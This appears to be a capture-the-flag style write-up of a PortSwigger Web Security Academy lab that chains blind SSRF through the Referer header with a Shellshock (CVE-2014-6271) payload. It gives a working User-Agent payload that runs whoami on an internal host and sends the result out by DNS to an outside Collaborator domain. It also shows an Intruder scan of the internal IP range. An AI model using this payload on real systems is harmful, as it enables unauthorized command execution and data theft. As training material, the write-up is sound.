Skip to content
Field Value
Platform PortSwigger Web Security Academy
Type Blind SSRF + Shellshock RCE → Data Exfiltration
Difficulty Expert
Objective Use blind SSRF via the Referer header to execute a Shellshock payload against an internal server and exfiltrate the OS username

Blind SSRF with Shellshock Exploitation — Writeup

Initial Observation

Intercepting a product page request:

Screenshot

The analytics software fetches the URL in the Referer header — same blind SSRF vector as the previous lab. This time we're pointing it at the internal 192.168.0.X:8080 range and combining it with a Shellshock payload.

Understanding Shellshock

Shellshock (CVE-2014-6271) is a critical vulnerability in Bash that allows arbitrary command execution through specially crafted environment variables. The malicious pattern is:

() { : ; }; <command>

When Bash processes a function definition in an environment variable, the vulnerable version also executes anything after the function body. Web servers that use CGI pass HTTP headers like User-Agent as environment variables to shell scripts. If the server is running a CGI handler backed by a vulnerable version of Bash, injecting the payload in a header triggers remote code execution — no authentication required.

The internal server on 192.168.0.X:8080 is likely running a CGI application. When the analytics software fetches the Referer URL, it makes an HTTP request to that server — and our User-Agent travels with it. If Bash is vulnerable, the command after the pattern executes on the internal server.

Scanning + Shellshock via Intruder

Setting the payload position on the last octet of the Referer IP and injecting the Shellshock payload in the User-Agent. The command runs nslookup $(whoami) against our Collaborator domain — $(whoami) gets substituted with the current OS user on the internal server, and that value shows up as a subdomain in the DNS lookup Collaborator receives:

User-Agent: () { : ; }; /usr/bin/nslookup $(whoami).hzk60wxlgzdmwdemxl4nxih6kxqpeh26.oastify.com
Referer: http://192.168.0.§X§:8080
Screenshot

Burp Intruder runs through 0–255 on the last octet. When it hits the right host, the Shellshock payload executes — Collaborator receives the DNS lookup:

Screenshot 
peter-lZxt98.hzk60wxlgzdmwdemxl4nxih6kxqpeh26.oastify.com

The OS user is peter-lZxt98. Submitting it solves the lab:

Screenshot

At least carlos did not got deleted this time....

Resources